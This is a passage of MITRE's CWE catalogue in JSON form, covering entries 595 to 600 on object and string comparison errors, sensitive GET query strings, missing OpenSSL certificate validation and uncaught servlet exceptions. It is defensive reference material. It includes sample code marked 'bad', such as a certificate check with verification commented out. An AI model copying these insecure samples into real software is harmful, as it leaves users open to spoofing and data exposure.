Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Persistence in J2EE Frameworks","attr":{"@_Date":"2008-04-11"}}}},"595":{"attr":{"@_ID":"595","@_Name":"Comparison of Object References Instead of Object Contents","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program compares object references instead of the contents of the objects themselves, preventing it from detecting equivalent objects.","Extended_Description":"For example, in Java, comparing objects using == usually produces deceptive results, since the == operator compares object references rather than values; often, this means that using == for strings is actually comparing the strings\' references, not their values.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1025","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"This weakness can lead to erroneous results that can cause unexpected application behaviors."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"In Java, use the equals() method to compare objects instead of the == operator. If using ==, it is important for performance reasons that your objects are created by a static factory, not by a constructor."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-60"},"Intro_Text":"In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String str1 = new String(\\"Hello\\");String str2 = new String(\\"Hello\\");if (str1 == str2) {}","xhtml:br":["",""],"xhtml:div":{"#text":"System.out.println(\\"str1 == str2\\");","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (str1.equals(str2)) {}","xhtml:div":{"#text":"System.out.println(\\"str1 equals str2\\");","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"However, the if statement will not be executed as the strings are compared using the \\"==\\" operator. For Java objects, such as String objects, the \\"==\\" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method:"},{"Intro_Text":"In the following Java example, two BankAccount objects are compared in the isSameAccount method using the == operator.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {}","xhtml:div":{"#text":"return accountA == accountB;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {}","xhtml:div":{"#text":"return accountA.equals(accountB);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["Using the == operator to compare objects may produce incorrect or deceptive results by comparing object references rather than values. The equals() method should be used to ensure correct results or objects should contain a member variable that uniquely identifies the object.","The following example shows the use of the equals() method to compare the BankAccount objects and the next example uses a class get method to retrieve the bank account number that uniquely identifies the BankAccount object to compare the objects."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP02-J","Entry_Name":"Use the two-argument Arrays.equals() method to compare the contents of arrays"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP02-J","Entry_Name":"Use the two-argument Arrays.equals() method to compare the contents of arrays"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP03-J","Entry_Name":"Do not use the equality operators when comparing values of boxed primitives"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-954"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Incorrect Object Comparison: Syntactic","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Syntactic Object Comparison","attr":{"@_Date":"2009-05-27"}}]}},"596":{"attr":{"@_ID":"596","@_Name":"DEPRECATED: Incorrect Semantic Object Comparison","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated.  It was poorly described and difficult to distinguish from other entries.  It was also inappropriate to assign a separate ID solely because of domain-specific considerations.  Its closest equivalent is CWE-1023.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Relationships, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Incorrect Object Comparison: Semantic","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Semantic Object Comparison","attr":{"@_Date":"2018-03-27"}}]}},"597":{"attr":{"@_ID":"597","@_Name":"Use of Wrong Operator in String Comparison","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses the wrong operator when comparing a string, such as using \\"==\\" when the .equals() method should be used instead.","Extended_Description":"In Java, using == or != to compare two strings for equality actually compares two objects for equality rather than their string values for equality. Chances are good that the two references will never be equal. While this weakness often only affects program correctness, if the equality is used for a security decision, the unintended comparison result could be leveraged to affect program security.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"595","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"595","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"480","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":{"#text":"Within Java, use .equals() to compare string values.Within JavaScript, use == to compare string values.Within PHP, use == to compare a numeric value to a string value. (PHP converts the string to a number.)","xhtml:br":["",""]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-60"},"Intro_Text":"In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String str1 = new String(\\"Hello\\");String str2 = new String(\\"Hello\\");if (str1 == str2) {}","xhtml:br":["",""],"xhtml:div":{"#text":"System.out.println(\\"str1 == str2\\");","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (str1.equals(str2)) {}","xhtml:div":{"#text":"System.out.println(\\"str1 equals str2\\");","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"However, the if statement will not be executed as the strings are compared using the \\"==\\" operator. For Java objects, such as String objects, the \\"==\\" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method:"},{"Intro_Text":"In the example below, three JavaScript variables are declared and initialized with the same values. Note that JavaScript will change a value between numeric and string as needed, which is the reason an integer is included with the strings. An if statement is used to determine whether the values are the same.","Example_Code":[{"#text":"&lt;p id=\\"ieq3s1\\" type=\\"text\\"&gt;(i === s1) is FALSE&lt;/p&gt;&lt;p id=\\"s4eq3i\\" type=\\"text\\"&gt;(s4 === i) is FALSE&lt;/p&gt;&lt;p id=\\"s4eq3s1\\" type=\\"text\\"&gt;(s4 === s1) is FALSE&lt;/p&gt;var i = 65;var s1 = \'65\';var s4 = new String(\'65\');if (i === s1){}if (s4 === i){}if (s4 === s1){}","attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:br":["","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"document.getElementById(\\"ieq3s1\\").innerHTML = \\"(i === s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq3i\\").innerHTML = \\"(s4 === i) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq3s1\\").innerHTML = \\"(s4 === s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"&lt;p id=\\"ieq2s1\\" type=\\"text\\"&gt;(i == s1) is FALSE&lt;/p&gt;&lt;p id=\\"s4eq2i\\" type=\\"text\\"&gt;(s4 == i) is FALSE&lt;/p&gt;&lt;p id=\\"s4eq2s1\\" type=\\"text\\"&gt;(s4 == s1) is FALSE&lt;/p&gt;var i = 65;var s1 = \'65\';var s4 = new String(\'65\');if (i == s1){}if (s4 == i){}if (s4 == s1){}","attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:br":["","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"document.getElementById(\\"ieq2s1\\").innerHTML = \\"(i == s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq2i\\").innerHTML = \\"(s4 == i) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq2s1\\").innerHTML = \\"(s4 == s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":{"xhtml:p":["However, the body of the if statement will not be executed, as the \\"===\\" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails. The types in the second are int and reference, so this one fails as well. The types in the third are reference and string, so it also fails.","While the variables above contain the same values, they are contained in different types, so the document.getElementById... statement will not be executed in any of the cases.","To compare object values, the previous code is modified and shown below to use the \\"==\\" for value comparison so the comparison in this example executes the HTML statement:"]}},{"Intro_Text":"In the example below, two PHP variables are declared and initialized with the same numbers - one as a string, the other as an integer. Note that PHP will change the string value to a number for a comparison. An if statement is used to determine whether the values are the same.","Example_Code":[{"#text":"var $i = 65;var $s1 = \\"65\\";if ($i === $s1){}else{}","attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"echo \'($i === $s1) is TRUE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'($i === $s1) is FALSE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"var $i = 65;var $s1 = \\"65\\";if ($i == $s1){}else{}","attr":{"@_Nature":"good","@_Language":"PHP"},"xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"echo \'($i == $s1) is TRUE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'($i == $s1) is FALSE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":{"xhtml:p":["However, the body of the if statement will not be executed, as the \\"===\\" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails.","While the variables above contain the same values, they are contained in different types, so the TRUE portion of the if statement will not be executed.","To compare object values, the previous code is modified and shown below to use the \\"==\\" for value comparison (string converted to number) so the comparison in this example executes the TRUE statement:"]}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP03-J","Entry_Name":"Do not use the equality operators when comparing values of boxed primitives"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP03-J","Entry_Name":"Do not use the equality operators when comparing values of boxed primitives"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP35-PL","Entry_Name":"Use the correct operator type for comparing values","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Typos&#34;, Page 289"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Erroneous String Compare","attr":{"@_Date":"2008-04-11"}}}},"598":{"attr":{"@_ID":"598","@_Name":"Use of GET Request Method With Sensitive Query Strings","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application uses the HTTP GET method to process a request and includes sensitive information in the query string of that request.","Extended_Description":"The query string for the URL could be saved in the browser\'s history, passed through Referers to other web sites, stored in web logs, or otherwise recorded in other sources.  If the query string contains sensitive information such as session identifiers, then attackers can use this information to launch further attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"201","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"At a minimum, attackers can garner information from query strings that can be utilized in escalating their method of attack, such as information about the internal workings of the application or database column names. Successful exploitation of query string parameter vulnerabilities could lead to an attacker impersonating a legitimate user, obtaining proprietary data, or simply executing actions not intended by the application developers."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When sensitive information is sent, use the POST method (e.g. registration form)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description"}],"Previous_Entry_Name":[{"#text":"Information Leak Through GET Request","attr":{"@_Date":"2008-04-11"}},{"#text":"Information Leak Through Query Strings in GET Request","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Query Strings in GET Request","attr":{"@_Date":"2020-02-24"}}]}},"599":{"attr":{"@_ID":"599","@_Name":"Missing Validation of OpenSSL Certificate","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses OpenSSL and trusts or uses a certificate without using the SSL_get_verify_result() function to ensure that the certificate satisfies all necessary security requirements.","Extended_Description":"This could allow an attacker to use an invalid certificate to claim to be a trusted host, use expired certificates, or conduct other attacks that could be detected if the certificate is properly validated.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The data read may not be properly secured, it might be viewed by an attacker."},{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"Trust afforded to the system in question may allow for spoofing or redirection attacks."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If the certificate is not checked, it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data under the guise of a trusted host. While the attacker in question may have a valid certificate, it may simply be a valid certificate for a different site. In order to ensure data integrity, we must check that the certificate is valid, and that it pertains to the site we wish to access."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that proper authentication is included in the system design."},{"Phase":"Implementation","Description":"Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-125"},"Intro_Text":"The following OpenSSL code ensures that the host has a certificate.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","","","",""],"xhtml:i":["// got certificate, host can be trusted","//foo=SSL_get_verify_result(ssl);","//if (X509_V_OK==foo) ..."]}}}},"Body_Text":"Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate."}},"Notes":{"Note":{"#text":"CWE-295 and CWE-599 are very similar, although CWE-599 has a more narrow scope that is only applied to OpenSSL certificates. As a result, other children of CWE-295 can be regarded as children of CWE-599 as well. CWE\'s use of one-dimensional hierarchical relationships is not well-suited to handle different kinds of abstraction relationships based on concepts like types of resources (\\"OpenSSL certificate\\" as a child of \\"any certificate\\") and types of behaviors (\\"not validating expiration\\" as a child of \\"improper validation\\").","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"No OpenSSL Certificate Check Performed before Use","attr":{"@_Date":"2008-04-11"}},{"#text":"Trust of OpenSSL Certificate Without Validation","attr":{"@_Date":"2013-02-21"}}]}},"600":{"attr":{"@_ID":"600","@_Name":"Uncaught Exception in Servlet","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The Servlet does not catch all exceptions, which may reveal sensitive debugging information.","Extended_Description":"When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker. For example, a stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known vulnerabilities in these components.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"248","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"209","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"390","@_View_ID":"1000"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Missing Catch Block"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Availability"],"Impact":["Read Application Data","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implement Exception blocks to handle all types of Exceptions."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-39"},"Intro_Text":"The following example attempts to resolve a hostname.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {}","xhtml:div":{"#text":"String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println(\\"hello \\" + addr.getHostName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"A DNS lookup failure will cause the Servlet to throw an exception."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR01-J","Entry_Name":"Do not allow exceptions to expose sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"Notes":{"Note":{"#text":"The \\"Missing Catch Block\\" concept is probably broader than just Servlets, but the broader concept is not sufficiently covered in CWE.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Alternate_Terms, Description, Maintenance_Notes, Name, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, 